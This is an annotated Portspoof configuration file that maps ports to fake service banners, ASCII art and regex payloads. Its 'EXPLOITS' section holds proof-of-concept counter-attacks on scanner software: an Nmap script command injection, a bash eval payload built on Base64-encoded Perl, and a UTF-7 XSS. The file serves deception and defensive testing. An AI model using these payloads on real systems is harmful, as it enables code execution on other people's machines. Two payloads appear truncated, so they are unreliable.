# This is an example Portspoof configuration file
#
# Each entry maps a TCP port (or port range) to the payload that is sent back
# to a client connecting to that port. Payloads are double-quoted and may use
# \xNN hex escapes and regular-expression syntax.
#
# :Examples:
#
# 1. SINGLE PORT
#
# port "payload"
#
# 2. PORT RANGE
#
# port_nr_start-port_nr_end "payload"
#
# 3. PAYLOAD: Hex Encoded (useful for exploits)
#
# port "\x20\x20\x41\x41\x41 string payload"
#
# 4. PAYLOAD: Regular expressions
#
# port "regular_expression [\w]+ ..."

#Example: Send custom payload (this can be a simple string)
# Ports 1-50 each return one fixed-width row; read in port order, the rows
# appear to form an ASCII-art picture in a scanner's banner listing.
1 "550 12345 0000000000000000000000000000000000000000000000000000000"
2 "550 12345 0000000000000000000000000000000000000000000000000000000"
3 "550 12345 0000000000000000000000000000000000000000000000000000000"
4 "550 12345 0000000000000000000000000000000000000000000000000000000"
5 "550 12345 0000000000000000000000000000000000000000000000000000000"
6 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
7 "550 12345 0fffffffffffff777778887777777777cffffffffffffffffffff00"
8 "550 12345 0fffffffffff8000000000000000008888887cfcfffffffffffff00"
9 "550 12345 0ffffffffff80000088808000000888800000008887ffffffffff00"
10 "550 12345 0fffffffff70000088800888800088888800008800007ffffffff00"
11 "550 12345 0fffffffff000088808880000000000000088800000008fffffff00"
12 "550 12345 0ffffffff80008808880000000880000008880088800008ffffff00"
13 "550 12345 0ffffffff000000888000000000800000080000008800007fffff00"
14 "550 12345 0fffffff8000000000008888000000000080000000000007fffff00"
15 "550 12345 0ffffff70000000008cffffffc0000000080000000000008fffff00"
16 "550 12345 0ffffff8000000008ffffff007f8000000007cf7c80000007ffff00"
17 "550 12345 0fffff7880000780f7cffff7800f8000008fffffff80808807fff00"
18 "550 12345 0fff78000878000077800887fc8f80007fffc7778800000880cff00"
19 "550 12345 0ff70008fc77f7000000f80008f8000007f0000000000000888ff00"
20 "550 12345 0ff0008f00008ffc787f70000000000008f000000087fff8088cf00"
21 "550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00"
22 "550 12345 0f8008c008fff8000000000000780000007f800087708000800ff00"
23 "550 12345 0f8008707ff07ff8000008088ff800000000f7000000f800808ff00"
24 "550 12345 0f7000f888f8007ff7800000770877800000cf780000ff00807ff00"
25 "550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00"
26 "550 12345 0ff70800008ff800f007fff70880000087f70000007fcf7007fff00"
27 "550 12345 0fff70000007fffcf700008ffc778000078000087ff87f700ffff00"
28 "550 12345 0ffffc000000f80fff700007787cfffc7787fffff0788f708ffff00"
29 "550 12345 0fffff7000008f00fffff78f800008f887ff880770778f708ffff00"
30 "550 12345 0ffffff8000007f0780cffff700000c000870008f07fff707ffff00"
31 "550 12345 0ffffcf7000000cfc00008fffff777f7777f777fffffff707ffff00"
32 "550 12345 0cccccff0000000ff000008c8cffffffffffffffffffff807ffff00"
33 "550 12345 0fffffff70000000ff8000c700087fffffffffffffffcf808ffff00"
34 "550 12345 0ffffffff800000007f708f000000c0888ff78f78f777c008ffff00"
35 "550 12345 0fffffffff800000008fff7000008f0000f808f0870cf7008ffff00"
36 "550 12345 0ffffffffff7088808008fff80008f0008c00770f78ff0008ffff00"
37 "550 12345 0fffffffffffc8088888008cffffff7887f87ffffff800000ffff00"
38 "550 12345 0fffffffffffff7088888800008777ccf77fc777800000000ffff00"
39 "550 12345 0fffffffffffffff800888880000000000000000000800800cfff00"
40 "550 12345 0fffffffffffffffff70008878800000000000008878008007fff00"
41 "550 12345 0fffffffffffffffffff700008888800000000088000080007fff00"
42 "550 12345 0fffffffffffffffffffffc800000000000000000088800007fff00"
43 "550 12345 0fffffffffffffffffffffff7800000000000008888000008ffff00"
44 "550 12345 0fffffffffffffffffffffffff7878000000000000000000cffff00"
45 "550 12345 0ffffffffffffffffffffffffffffffc880000000000008ffffff00"
46 "550 12345 0ffffffffffffffffffffffffffffffffff7788888887ffffffff00"
47 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
48 "550 12345 0000000000000000000000000000000000000000000000000000000"
49 "550 12345 0000000000000000000000000000000000000000000000000000000"
50 "550 12345 0000000000000000000000000000000000000000000000000000000"

#Example: port range
# One payload shared by every port from 51 through 60.
# NOTE(review): FUZZ_HERE / __FUZZ__ look like placeholder markers; this file
# does not show whether or how they are expanded - confirm before relying on it.
51-60 "550 4m2v4 (FUZZ_HERE)"

#Example: Simple regular expression payloads
# NOTE(review): port 8080 is assigned again in the EXPLOITS section below;
# which of the two entries takes effect depends on the parser - confirm, or
# give one of them a different port.
8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"
8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n"
8082 "word: ... \. \d \w \n"

#Nmap regular expression matched payloads
# Banners shaped like real service greetings (SMTP, POP3, HTTP), presumably so
# that a scanner's version-detection patterns match them.
8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n"
8101 "220 FUZZ_HERE SMTP ready to roll\r\n"
8102 "550 12345 FUZZ_HERE"
8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n"
# NOTE(review): the 8104 payload spans raw line breaks and its HTML body looks
# as if the markup was stripped when this page was captured; compare with the
# upstream file before using it.
8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\nLog In - Juniper Web Device Manager
Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80
"

## EXPLOITS ##
# The entries below are responses aimed at the software that reads scan
# output (an Nmap script, a shell that interpolates scan output, a report
# viewer). For anyone operating scanners, the takeaway is that service banners
# are untrusted input: keep scanner scripts current, never feed raw scan output
# into shell command substitution, and HTML-escape banners in reports.

# NMAP
# nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145 -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/' -d4
# NOTE(review): the affected Nmap versions are not stated in this file. The
# payload below also spans a raw line break and appears to have lost markup
# when this page was captured.
80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--\r\n--\r\n--\r\n--\r\n\r\n--\r\n--
\r\n--\r\n--\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"

#OS cmd injection payload for bash: $(cat output) and `cat output` injections
# The embedded Base64 decodes to a Perl demonstration snippet that prints a
# banner and the current working directory; nothing is actually uploaded.
# NOTE(review): this is the second entry for port 8080 (see the regular
# expression examples above).
8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;"

#McAfee SuperScan UTF7 XSS payload
# Relevant to report viewers that render banners as HTML without escaping or
# that auto-detect the UTF-7 charset.
1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"